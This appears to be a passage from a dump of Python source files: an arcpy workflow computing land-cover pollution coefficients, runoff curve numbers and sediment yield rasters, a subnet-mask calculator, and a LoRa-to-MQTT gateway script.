input land cover raster, creates a new raster representing the NSPECT coefficient type specified (coeffType). Coefficient values are from the OpenNSPECT Technical Guide. The land cover codes in that table are CCAP codes, so assignments in this function are to the equivalent NLCD codes. \r\n \r\n The coefficients that may be specified are:\r\n - CFACT: The cover factor (C-Factor in the RUSLE equation; a unitless ratio)\r\n - NPOLL: Nitrogen pollution factor (mg/L)\r\n - PPOLL: Phosphorus pollution factor (mg/L)\r\n - SPOLL: Suspended solids pollution factor (mg/L)\r\n \r\n C-factor values are assigned to land cover classes as specified in Table 4, page 22 of the OpenNSPECT Technical Guide. The pollution coefficients are specified in Appendix A, pages 42-43.\r\n \r\n This function modifies the input land cover attribute table, by adding and calculating a new field to store the desired coefficients.\r\n\r\n Parameters:\r\n - in_LC: Input classified land cover raster, using standard NLCD land cover codes (updated with CCAP for code 32 = unconsolidated shore)\r\n - coeffType: The coefficient set used to produce the output\r\n - out_Coeff: Output raster representing specified coefficient values\r\n '''\r\n \r\n # Make sure user entered valid parameters, and report what they are. \r\n if coeffType not in (\"CFACT\", \"NPOLL\", \"PPOLL\", \"SPOLL\"):\r\n print(\"Input coefficient type specification is invalid. Aborting.\")\r\n sys.exit()\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Initialize empty data dictionary\r\n d = dict()\r\n \r\n if coeffType == \"NPOLL\":\r\n fldName = \"Nitrogen\"\r\n msg = \"Adding field to store nitrogen pollution values...\"\r\n # Nitrogen pollution dictionary\r\n d[11] = 0.00\r\n d[21] = 1.25\r\n d[22] = 1.77\r\n d[23] = 2.29\r\n d[24] = 2.22\r\n d[31] = 0.97\r\n d[32] = 0.97\r\n d[41] = 1.25\r\n d[42] = 1.25\r\n d[43] = 1.25\r\n d[52] = 1.25\r\n d[71] = 1.25\r\n d[81] = 2.48\r\n d[82] = 2.68\r\n d[90] = 1.10\r\n d[95] = 1.10\r\n \r\n elif coeffType == \"PPOLL\":\r\n fldName = \"Phosphorus\"\r\n msg = \"Adding field to store phosphorus pollution values...\"\r\n # Phosphorus pollution dictionary\r\n d[11] = 0.00\r\n d[21] = 0.05\r\n d[22] = 0.18\r\n d[23] = 0.30\r\n d[24] = 0.47\r\n d[31] = 0.12\r\n d[32] = 0.12\r\n d[41] = 0.05\r\n d[42] = 0.05\r\n d[43] = 0.05\r\n d[52] = 0.05\r\n d[71] = 0.05\r\n d[81] = 0.48\r\n d[82] = 0.42\r\n d[90] = 0.20\r\n d[95] = 0.20 \r\n \r\n elif coeffType == \"SPOLL\":\r\n fldName = \"Solids\"\r\n msg = \"Adding field to store suspended solids pollution values...\"\r\n # Suspended solids pollution dictionary\r\n d[11] = 0.00\r\n d[21] = 11.10\r\n d[22] = 19.10\r\n d[23] = 27.00\r\n d[24] = 71.00\r\n d[31] = 70.00\r\n d[32] = 70.00\r\n d[41] = 11.10\r\n d[42] = 11.10\r\n d[43] = 11.10\r\n d[52] = 11.10\r\n d[71] = 55.30\r\n d[81] = 55.30\r\n d[82] = 107.00\r\n d[90] = 19.00\r\n d[95] = 19.00 \r\n \r\n else:\r\n fldName = \"Cfactor\"\r\n msg = \"Adding field to store C-factor values...\"\r\n # C-factor dictionary\r\n d[11] = 0.000\r\n d[21] = 0.005\r\n d[22] = 0.030\r\n d[23] = 0.010\r\n d[24] = 0.000\r\n d[31] = 0.700\r\n d[32] = 0.500\r\n d[41] = 0.009\r\n d[42] = 0.004\r\n d[43] = 0.007\r\n d[52] = 0.014\r\n d[71] = 0.120\r\n d[81] = 0.005\r\n d[82] = 0.240\r\n d[90] = 0.003\r\n d[95] = 0.003\r\n \r\n # Create and calculate a coefficient field in the land cover attribute table\r\n print(msg)\r\n arcpy.AddField_management(in_LC, fldName, \"DOUBLE\")\r\n \r\n print(\"Calculating field...\")\r\n 
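# Note: the %s below splices the coefficient dictionary literal into the\r\n # field-calculator expression, so coeff() is evaluated once per attribute-table row,\r\n # and land cover codes missing from the dictionary fall back to a coefficient of 0.\r\n 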
codeblock = '''def coeff(code, dic):\r\n try: \r\n val = dic[code]\r\n except:\r\n val = 0\r\n return val\r\n '''\r\n expression = \"coeff(!VALUE!, %s)\" %d\r\n arcpy.CalculateField_management (in_LC, fldName, expression, 'PYTHON', codeblock)\r\n \r\n # Create a new raster from the coefficient field, and save\r\n print(\"Creating raster...\")\r\n outRaster = Lookup(in_LC, fldName)\r\n \r\n print(\"Saving output...\")\r\n outRaster.save(out_Coeff)\r\n \r\n print(\"Mission complete.\")\r\n \r\ndef curvNum(in_LC, in_HydroGrp, out_CN):\r\n '''Given input land cover and hydrologic group, produces output raster representing runoff curve numbers.\r\n \r\n Curve numbers are assigned to combinations of land cover and soil types as specified in Table 1, page 6 of the OpenNSPECT Technical Guide. \r\n \r\n This function modifies the input land cover attribute table, by adding and calculating a new field to store the curve numbers\r\n\r\n Parameters:\r\n - in_LC: Input classified land cover raster, using standard NLCD land cover codes (updated with CCAP for code 32 = unconsolidated shore), OR an integer representing a desired land cover class\r\n - in_HydroGrp: Input raster representing hydrologic groups (integer values must range from 1 = A to 4 = D)\r\n - out_CN: Output raster representing runoff curve numbers\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set scratch output location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Initialize empty data dictionaries\r\n dictA = dict()\r\n dictB = dict()\r\n dictC = dict()\r\n dictD = dict()\r\n m = dict()\r\n \r\n # Populate dictionary for hydro group A, then append to list\r\n dictA[11] = 0\r\n dictA[21] = 49\r\n dictA[22] = 61\r\n dictA[23] = 77\r\n dictA[24] = 89\r\n dictA[31] = 77\r\n dictA[32] = 0\r\n dictA[41] = 30\r\n dictA[42] = 30\r\n dictA[43] = 30\r\n dictA[52] = 30\r\n dictA[71] = 30\r\n dictA[81] = 39\r\n dictA[82] = 67\r\n dictA[90] = 0\r\n dictA[95] = 0\r\n m[\"A\"] = dictA\r\n \r\n # Populate dictionary for hydro group B\r\n dictB[11] = 0\r\n dictB[21] = 69\r\n dictB[22] = 75\r\n dictB[23] = 85\r\n dictB[24] = 92\r\n dictB[31] = 86\r\n dictB[32] = 0\r\n dictB[41] = 55\r\n dictB[42] = 55\r\n dictB[43] = 55\r\n dictB[52] = 48\r\n dictB[71] = 58\r\n dictB[81] = 61\r\n dictB[82] = 78\r\n dictB[90] = 0\r\n dictB[95] = 0\r\n m[\"B\"] = dictB\r\n \r\n # Populate dictionary for hydro group C\r\n dictC[11] = 0\r\n dictC[21] = 79\r\n dictC[22] = 83\r\n dictC[23] = 90\r\n dictC[24] = 94\r\n dictC[31] = 91\r\n dictC[32] = 0\r\n dictC[41] = 70\r\n dictC[42] = 70\r\n dictC[43] = 70\r\n dictC[52] = 65\r\n dictC[71] = 71\r\n dictC[81] = 74\r\n dictC[82] = 85\r\n dictC[90] = 0\r\n dictC[95] = 0\r\n m[\"C\"] = dictC\r\n \r\n # Populate dictionary for hydro group D\r\n dictD[11] = 0\r\n dictD[21] = 84\r\n dictD[22] = 87\r\n dictD[23] = 92\r\n dictD[24] = 95\r\n dictD[31] = 94\r\n dictD[32] = 0\r\n dictD[41] = 77\r\n dictD[42] = 77\r\n dictD[43] = 77\r\n dictD[52] = 73\r\n dictD[71] = 78\r\n dictD[81] = 80\r\n dictD[82] = 89\r\n dictD[90] = 0\r\n dictD[95] = 0\r\n m[\"D\"] = dictD\r\n \r\n hydroGrps = [\"A\", \"B\", \"C\", \"D\"]\r\n in_HydroGrp = Raster(in_HydroGrp)\r\n \r\n if type(in_LC) == str:\r\n # Create and calculate curve number fields in the land cover attribute table\r\n for grp in hydroGrps: \r\n fldName = \"cn_%s\" %grp\r\n d = m[grp]\r\n \r\n fldList = arcpy.ListFields(in_LC) \r\n fldNames = [f.name for f in fldList]\r\n if fldName in fldNames:\r\n print(\"Deleting existing field %s...\" 
%fldName)\r\n arcpy.DeleteField_management (in_LC, fldName)\r\n \r\n print(\"Adding field %s...\" %fldName)\r\n arcpy.AddField_management(in_LC, fldName, \"SHORT\")\r\n \r\n print(\"Calculating field...\")\r\n codeblock = '''def curvnum(code, dic):\r\n try:\r\n cn = dic[code]\r\n except:\r\n cn = 0\r\n return cn\r\n '''\r\n expression = \"curvnum(!VALUE!, %s)\" %d\r\n arcpy.CalculateField_management (in_LC, fldName, expression, 'PYTHON', codeblock)\r\n \r\n # Create a new raster from the curve number fields, based on soil type\r\n print(\"Creating curve number raster...\")\r\n outRaster = Con(in_HydroGrp == 1, Lookup(in_LC, \"cn_A\"), Con(in_HydroGrp == 2, Lookup(in_LC, \"cn_B\"), Con(in_HydroGrp == 3, Lookup(in_LC, \"cn_C\"),Con(in_HydroGrp == 4, Lookup(in_LC, \"cn_D\")))))\r\n \r\n else:\r\n # Use the specified land cover constant with soil type to get the curve number\r\n outRaster = Con(in_HydroGrp == 1, dictA[in_LC], Con(in_HydroGrp == 2, dictB[in_LC], Con(in_HydroGrp == 3, dictC[in_LC],Con(in_HydroGrp == 4, dictD[in_LC]))))\r\n \r\n print(\"Saving output...\")\r\n outRaster.save(out_CN)\r\n \r\n print(\"Mission complete.\")\r\n\r\ndef eventRunoff(in_Raster, in_Rain, out_GDB, yearTag, cellArea = 1000000, inputType = \"CN\", convFact = 1):\r\n '''Produces an output raster representing event-based runoff volume in Liters\r\n \r\n Parameters:\r\n - in_Raster: input raster representing curve numbers OR maximum retention\r\n - in_Rain: input constant or raster representing rainfall\r\n - out_GDB: geodatabase for storing outputs\r\n - yearTag: tag to add to basenames to indicate land cover year determining curve numbers \r\n - cellArea: area of cells in Curve Number raster, in square centimeters\r\n - inputType: indicates whether in_Raster is curve numbers (CN) or retention (RET)\r\n - convFact: conversion factor to convert input rainfall depth units to inches\r\n '''\r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set scratch output location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Set up some variables\r\n in_Raster = Raster(in_Raster)\r\n try:\r\n in_Rain = Raster(in_Rain)\r\n except:\r\n pass\r\n out_Retention = out_GDB + os.sep + \"Retention_%s\" %yearTag\r\n out_runoffDepth = out_GDB + os.sep + \"runoffDepth_%s\" %yearTag\r\n out_runoffVolume = out_GDB + os.sep + \"runoffVol_%s\" %yearTag\r\n out_accumRunoff = out_GDB + os.sep + \"accRunoff_%s\" %yearTag\r\n\r\n # Perform calculations\r\n # Result could be raster or a constant depending on input\r\n if convFact != 1:\r\n rain = convFact*in_Rain \r\n else:\r\n rain = in_Rain\r\n \r\n if inputType == \"CN\":\r\n print(\"Calculating maximum retention...\")\r\n # Have to deal with division by zero here.\r\n retention = Con(in_Raster == 0, 1000, ((float(1000)/in_Raster) - 10))\r\n print(\"Saving...\")\r\n retention.save(out_Retention)\r\n else:\r\n retention = in_Raster\r\n \r\n print(\"Calculating runoff depth (inches)...\")\r\n # Set runoff depth to zero if rainfall is less than initial abstraction\r\n runoffDepth = Con((rain - 0.2*retention) > 0,(rain - 0.2*retention)**2/(rain + 0.8*retention),0)\r\n print(\"Saving...\")\r\n runoffDepth.save(out_runoffDepth)\r\n \r\n print(\"Calculating runoff volume (liters)...\")\r\n # 2.54 converts inches to cm\r\n # 0.001 converts cubic cm to liters\r\n volumeConversion = 0.00254*cellArea\r\n runoffVolume = volumeConversion*runoffDepth\r\n print(\"Saving...\")\r\n runoffVolume.save(out_runoffVolume)\r\n \r\n # if in_FlowDir != \"NONE\":\r\n # 
print(\"Calculating runoff accumulation...\")\r\n # accumRunoff = FlowAccumulation(in_FlowDir, runoff, \"FLOAT\", \"D8\") + runoff\r\n # print(\"Saving...\")\r\n # accumRunoff.save(out_accumRunoff)\r\n # else:\r\n # print(\"No flow direction raster provided; runoff not accumulated.\")\r\n \r\n print(\"Mission accomplished.\")\r\n \r\ndef main():\r\n # Inputs - Soils\r\n dc_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_DC\\gSSURGO_DC.gdb\"\r\n de_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_DE\\gSSURGO_DE.gdb\"\r\n ky_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_KY\\gSSURGO_KY.gdb\"\r\n md_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_MD\\gSSURGO_MD.gdb\"\r\n nc_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_NC\\gSSURGO_NC.gdb\"\r\n pa_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_PA\\gSSURGO_PA.gdb\"\r\n tn_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_TN\\gSSURGO_TN.gdb\"\r\n va_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_VA\\gSSURGO_VA.gdb\"\r\n wv_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_WV\\gSSURGO_WV.gdb\"\r\n \r\n # Inputs - Miscellany\r\n in_Snap = r\"E:\\SpatialData\\HealthyWatersWork\\HW_templateRaster_Feature\\HW_templateRaster.tif\"\r\n in_Elev = r\"E:\\SpatialData\\elev_cm.gdb\\elev_cm.gdb\\elev_cm_VA\"\r\n in_clpShp = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200601.gdb\\HW_template_buff13k_noHoles\"\r\n in_Rfactor = r\"F:\\CurrentData\\R_Factor\\R-Factor_CONUS.tif\"\r\n in_pmpPts = r\"E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\\Output\\General\\PMP_64457.gdb\\General_PMP_Points_64457\"\r\n pmpFld = \"PMP_24\"\r\n \r\n # Outputs\r\n outGDB = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200710.gdb\" # I change this frequently \r\n out_Runoff = outGDB + os.sep + \"runoffScore\"\r\n out_Erosion = outGDB + os.sep + \"erosionScore\"\r\n out_SoilSens = outGDB + os.sep + \"soilSens\" \r\n hydroGrp = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200527.gdb\\hydroGroup\"\r\n slope_perc = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200626.gdb\\slope_perc\"\r\n Kfactor = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200527.gdb\\rusleK\"\r\n Sfactor = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200626.gdb\\rusleS\"\r\n Rfactor = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200601.gdb\\rusleR\"\r\n rusleRKS = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200626.gdb\\rusleRKS\"\r\n maxPrecip250 = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200629.gdb\\maxPrecip_gen24_topo250\"\r\n maxPrecip10 = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200629.gdb\\maxPrecip_gen24_topo10\"\r\n in_Rain = maxPrecip10\r\n \r\n # Year-specific Outputs/Inputs\r\n # RUSLE C-Factor\r\n rusleC_2016 = outGDB + os.sep + \"rusleC_2016\"\r\n rusleC_2011 = outGDB + os.sep + \"rusleC_2011\"\r\n rusleC_2006 = outGDB + os.sep + \"rusleC_2006\"\r\n rusleC_2001 = outGDB + os.sep + \"rusleC_2001\" \r\n \r\n # RUSLE RKSC\r\n rusleRKSC_2016 = outGDB + os.sep + \"rusleRKSC_2016\"\r\n rusleRKSC_2011 = outGDB + os.sep + \"rusleRKSC_2011\"\r\n rusleRKSC_2006 = outGDB + os.sep + \"rusleRKSC_2006\"\r\n rusleRKSC_2001 = outGDB + os.sep + \"rusleRKSC_2001\"\r\n rusleRKSC_dfor = outGDB + os.sep + \"rusleRKSC_dfor\"\r\n rusleRKSC_bare = outGDB + os.sep + \"rusleRKSC_bare\"\r\n \r\n # Curve Numbers\r\n curvNum_2016 = outGDB + os.sep + \"curvNum_2016\"\r\n curvNum_2011 = outGDB + os.sep + \"curvNum_2011\"\r\n curvNum_2006 = outGDB + os.sep + \"curvNum_2006\"\r\n curvNum_2001 = outGDB + os.sep + \"curvNum_2001\"\r\n curvNum_dfor = outGDB + os.sep + \"curvNum_dfor\"\r\n curvNum_bare = 
outGDB + os.sep + \"curvNum_bare\"\r\n \r\n # Runoff Volume\r\n runoffVol_2016 = outGDB + os.sep + \"runoffVol_2016\"\r\n runoffVol_2011 = outGDB + os.sep + \"runoffVol_2011\"\r\n runoffVol_2006 = outGDB + os.sep + \"runoffVol_2006\"\r\n runoffVol_2001 = outGDB + os.sep + \"runoffVol_2001\"\r\n \r\n # Pollutant Coefficients\r\n Nitrogen_2016 = outGDB + os.sep + \"Nitrogen_2016\"\r\n Nitrogen_2011 = outGDB + os.sep + \"Nitrogen_2011\"\r\n Nitrogen_2006 = outGDB + os.sep + \"Nitrogen_2006\"\r\n Nitrogen_2001 = outGDB + os.sep + \"Nitrogen_2001\"\r\n Phosphorus_2016 = outGDB + os.sep + \"Phosphorus_2016\"\r\n Phosphorus_2011 = outGDB + os.sep + \"Phosphorus_2011\"\r\n Phosphorus_2006 = outGDB + os.sep + \"Phosphorus_2006\"\r\n Phosphorus_2001 = outGDB + os.sep + \"Phosphorus_2001\"\r\n SuspSolids_2016 = outGDB + os.sep + \"SuspSolids_2016\"\r\n SuspSolids_2011 = outGDB + os.sep + \"SuspSolids_2011\"\r\n SuspSolids_2006 = outGDB + os.sep + \"SuspSolids_2006\"\r\n SuspSolids_2001 = outGDB + os.sep + \"SuspSolids_2001\"\r\n \r\n # Processing Lists/Dictionaries\r\n gdbList = [dc_gdb, de_gdb, ky_gdb, md_gdb, nc_gdb, pa_gdb, tn_gdb, va_gdb, wv_gdb]\r\n testList = [dc_gdb]\r\n \r\n nlcdDict = dict()\r\n nlcdDict[2016] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2016_10m\"\r\n nlcdDict[2011] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2011_10m\"\r\n nlcdDict[2006] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2006_10m\"\r\n nlcdDict[2001] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2001_10m\"\r\n \r\n ### Specify function(s) to run\r\n createFGDB(outGDB) # Create the specified outGDB if it doesn't already exist\r\n \r\n ### Create NSPECT pollution coefficient rasters\r\n print(\"Creating year-specific NSPECT pollution coefficient rasters...\")\r\n nDict = dict()\r\n pDict = dict()\r\n sDict = dict()\r\n coeffList = [[\"Nitrogen\", \"NPOLL\", nDict], \r\n [\"Phosphorus\", \"PPOLL\", pDict], \r\n [\"SuspSolids\", \"SPOLL\", sDict]]\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n for coeff in coeffList:\r\n rName = coeff[0]\r\n coeffType = coeff[1]\r\n coeffDict = coeff[2]\r\n out_Coeff = outGDB + os.sep + \"%s_%s\" %(rName, year)\r\n coeffNSPECT(nlcdDict[year], coeffType, out_Coeff)\r\n coeffDict[year] = out_Coeff\r\n \r\n ### Create curve number rasters\r\n SSURGOtoRaster(gdbList, \"HydroGrpNum\", in_Snap, hydroGrp)\r\n print(\"Creating year-specific Curve Number rasters...\")\r\n cnDict = dict()\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n in_LC = nlcdDict[year]\r\n out_CN = outGDB + os.sep + \"curvNum_%s\" %year\r\n curvNum(in_LC, hydroGrp, out_CN)\r\n cnDict[year] = out_CN\r\n \r\n ### Create RUSLE factors\r\n print(\"Creating year-specific C-factors...\")\r\n cfactDict = dict()\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n in_LC = nlcdDict[year]\r\n out_Cfactor = outGDB + os.sep + \"rusleC_%s\" %year\r\n coeffNSPECT(in_LC, \"CFACT\", out_Cfactor)\r\n cfactDict[year] = out_Cfactor\r\n print(\"Downscaling R-factor...\")\r\n Downscale_ras(in_Rfactor, in_Snap, Rfactor, \"BILINEAR\", in_clpShp) # R-factor\r\n print(\"Creating K-factor raster...\")\r\n SSURGOtoRaster(gdbList, \"kFactor\", in_Snap, Kfactor) # K-factor\r\n print(\"Creating S-factor raster...\")\r\n SlopeTrans(in_Elev, \"ELEV\", \"RUSLE\", Sfactor, slope_perc, zfactor = 0.01) # S-factor\r\n print(\"Creating RKS raster...\")\r\n soilLoss_RKS(Rfactor, Kfactor, Sfactor, rusleRKS) # R*K*S\r\n \r\n ### Get Probable 
Maximum Precipitation\r\n # First had to use the PMP tool (https://www.dcr.virginia.gov/dam-safety-and-floodplains/pmp-tool) from within ArcGIS Pro to generate the points used for interpolation. I specified a 24-hour storm duration, and used the \"General\" output.\r\n # arcpy.ImportToolbox(r'E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\\Script\\VA_PMP_Tools_v2.tbx','')\r\n # arcpy..PMPCalc(r\"E:\\SpatialData\\HW_templateRaster_Feature\\HW_templateFeature.shp\", r\"E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\", r\"E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\\Output\", \"24\", \"24\", \"24\", True, None)\r\n interpPoints(in_pmpPts, pmpFld, in_Snap, maxPrecip250, in_clpShp, \"TOPO\", \"\", \"\", 250)\r\n Downscale_ras(maxPrecip250, in_Snap, maxPrecip10, \"BILINEAR\", in_clpShp)\r\n \r\n ### Create runoff, pollution, and sediment yield rasters\r\n print(\"Creating year-specific runoff, pollution, and sediment yield rasters...\")\r\n runoffDict = dict()\r\n nMassDict = dict()\r\n pMassDict = dict()\r\n sMassDict = dict()\r\n pollutantList = [[\"Nitrogen\", nDict, nMassDict], \r\n [\"Phosphorus\", pDict, pMassDict], \r\n [\"SuspSolids\", sDict, sMassDict ]]\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n CN = cnDict[year]\r\n cFact = cfactDict[year]\r\n print(\"Calculating runoff...\")\r\n eventRunoff(CN, in_Rain, outGDB, year, 1000000, \"CN\")\r\n runoffDict[year] = outGDB + os.sep + \"runoffVol_%s\" %year\r\n for pollutant in pollutantList:\r\n rName = pollutant[0]\r\n coeffDict = pollutant[1]\r\n massDict = pollutant[2]\r\n out_Raster = outGDB + os.sep + \"LocMass_%s_%s\"%(rName, year)\r\n print(\"Calculating %s mass...\"%rName)\r\n pollMass = Raster(coeffDict[year])*Raster(runoffDict[year])\r\n pollMass.save(out_Raster)\r\n massDict[year] = out_Raster\r\n print(\"Calculating standard sediment yield...\")\r\n SedYld(rusleRKS, CN, year, slope_perc, outGDB, cFact, sdrType = \"STD\", cellArea = 0.0001)\r\n print(\"Calculating alternate sediment yield...\")\r\n SedYld(rusleRKS, CN, year, slope_perc, outGDB, cFact, sdrType = \"ALT\")\r\n \r\n ### Get \"worst-case\" (bare land, NLCD code 31, C-factor = 0.700) and \"best-case\" (deciduous forest, NLCD code 41, C-factor = 0.009) scenarios for curve numbers, runoff, and sedimentation. These are not necessarily the best or worst (e.g., wetlands are even better than deciduous forest) but serve the purpose here.\r\n print(\"Calculating best- and worst-case curve numbers...\")\r\n curvNum(41, hydroGrp, curvNum_dfor)\r\n curvNum(31, hydroGrp, curvNum_bare)\r\n # Event runoff\r\n print(\"Calculating best- and worst-case runoff...\")\r\n eventRunoff(curvNum_dfor, in_Rain, outGDB, \"dfor\")\r\n eventRunoff(curvNum_bare, in_Rain, outGDB, \"bare\")\r\n # Soil loss potential\r\n print(\"Calculating best- and worst-case soil loss potential...\")\r\n soilLoss_RKSC(rusleRKS, 0.009, rusleRKSC_dfor)\r\n soilLoss_RKSC(rusleRKS, 0.700, rusleRKSC_bare)\r\n print(\"Mission accomplished.\")\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"procSSURGO.py","file_name":"procSSURGO.py","file_ext":"py","file_size_in_byte":47976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"277651706","text":"import ipaddress\r\nimport math\r\nimport os\r\nimport subprocess\r\n\r\n#default subnetmask\r\nsubnet_mask={'A':'255.0.0.0','B':'255.255.0.0','C':'255.255.255.0','D':'255.255.255.255'}\r\n\r\n#identifies class of ip addr(classful)\r\n\r\ndef findClass(ip_addr,n):\r\n\toctet=ip_addr.split('.')\r\n\tnew_mask=\"\"\r\n\tnet_id=\"\"\r\n\tif int(octet[0]) in range(0,128) and n<=24:\r\n\t\tprint('Class A')\r\n\t\tprint(\"Old Subnet==\"+subnet_mask['A'])\r\n\t\tl1=subnet_mask['A'].split('.')\r\n\t\ttemp=0\r\n\t\tfor i in range(0,n):\t\r\n \t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\r\n\t\tl1[1]=str(temp)\r\n\t\tnew_mask=\".\".join(l1)\r\n\t\tprint(\"New subnet==\"+ new_mask)\r\n\t\tnet_id=octet[0]+'.0.0.0'\r\n\t\r\n\r\n\telif int(octet[0]) in range(128,192) and n<=16:\r\n\t\tprint('Class B')\r\n\t\tprint(\"Old Subnet==\"+subnet_mask['B'])\r\n\t\tl1=subnet_mask['B'].split('.')\r\n\t\ttemp=0\r\n\t\tfor i in range(0,n):\t\r\n \t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\r\n\t\tl1[2]=str(temp)\r\n\t\tnew_mask=\".\".join(l1)\r\n\t\tprint(\"New subnet==\"+new_mask)\r\n\t\tnet_id=octet[0]+\".\"+octet[1]+'.0.0'\t\r\n\t\t\r\n\telif int(octet[0]) in range(192,224) and n<=8:\r\n\t\tprint('Class C')\r\n\t\tprint(\"Old Subnet==\"+subnet_mask['C'])\r\n\t\tl1=subnet_mask['C'].split('.')\r\n\r\n\t\ttemp=0\r\n\t\tfor i in range(0,n):\t\r\n \t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\r\n\t\tl1[3]=str(temp)\r\n\t\tnew_mask=\".\".join(l1)\r\n\t\tprint(\"New subnet==\"+new_mask)\r\n\t\tnet_id=octet[0]+\".\"+octet[1]+\".\"+octet[2]+'.0'\r\n\treturn new_mask,net_id\t\r\n\t\r\n\t\r\ndef subnet_mask_classless(length):\r\n\tmask=[]\r\n\tif length <8 :\r\n\t\t\r\n\t\ttemp=0\r\n\t\tfor i in range(0,length):\t\r\n\t\t\ttemp=temp+2**(7-i)\r\n\t\t\tmask.append(str(temp))\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\r\n\tif length>=8 and length<16:\r\n\t\tmask.append('255')\r\n\t\tif(length>8):\r\n\t\t\tlength-=8\r\n\t\t\ttemp=0\r\n\t\t\tfor i in range(0,length):\t\r\n\t\t\t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\tmask.append(str(temp))\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\telse:\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\t\r\n\t\t\r\n\t\t\t\r\n\telif length>=16 and length<24:\r\n\t\tmask.append('255')\r\n\t\tmask.append('255')\r\n\t\tif(length>16):\r\n\t\t\tlength-=16\r\n\t\t\ttemp=0\r\n\t\t\tfor i in range(0,length):\t\r\n\t\t\t\ttemp=temp+2**(7-i)\r\n\t\t\tmask.append(str(temp))\r\n\t\t\tmask.append('0')\r\n\t\telse:\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\r\n\telif length>=24 and length<32:\r\n\t\tmask.append('255')\r\n\t\tmask.append('255')\r\n\t\tmask.append('255')\r\n\t\tif(length>24):\r\n\t\t\tlength-=24\r\n\t\t\ttemp=0\r\n\t\t\tfor i in range(0,length):\t\r\n\t\t\t\ttemp=temp+2**(7-i)\r\n\t\t\tmask.append(str(temp))\r\n \t\r\n\treturn \".\".join(mask)\r\n\t\t\r\n\r\n\t\t\r\n\t\r\n\t\r\n\r\n\t\r\n#creates subnets\t\r\n\r\ndef subNet(ip_addr,subnets_gr,no_of_subnets):\r\n\tfor i, subnet in enumerate(subnets_gr):\r\n\t\tif(i payload topic dan payload data\n print (payload[\"topic\"])\n print (payload[\"data\"])\n print()\n #bikin json dari array payload data \n payload2 = json.dumps(payload[\"data\"])\n #publish ke broker\n test.publish(payload[\"topic\"], payload2)\n \n except Exception as e:\n print(e)\n\ndef main():\n\n try:\n #GPIO.setwarnings(False)\n controller = config_lora.Controller()\n\n lora = controller.add_transceiver(sx127x.SX127x(name = 'LoRa'),\n pin_id_ss = 
config_lora.Controller.PIN_ID_FOR_LORA_SS,\n pin_id_RxDone = config_lora.Controller.PIN_ID_FOR_LORA_DIO0)\n print('lora', lora)\n\n #LoRaReceiver.receive(lora)\n print(\"LoRa Receiver\")\n while True: \n if lora.receivedPacket():\n # pass the callable and its argument separately so fwdToMQTT runs in the new thread\n t = threading.Thread(target=fwdToMQTT, args=(lora,))\n #threads.append(t)\n t.start()\n #print (threads)\n \n except KeyboardInterrupt:\n print (\"Program stopped by keyboard interrupt\")\n GPIO.cleanup()\n except Exception as e:\n print (\"an error occurred\")\n print (e)\n #finally:\n #GPIO.cleanup()\n\nif __name__ == '__main__':\n main()","sub_path":"gatewayToBroker.py","file_name":"gatewayToBroker.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
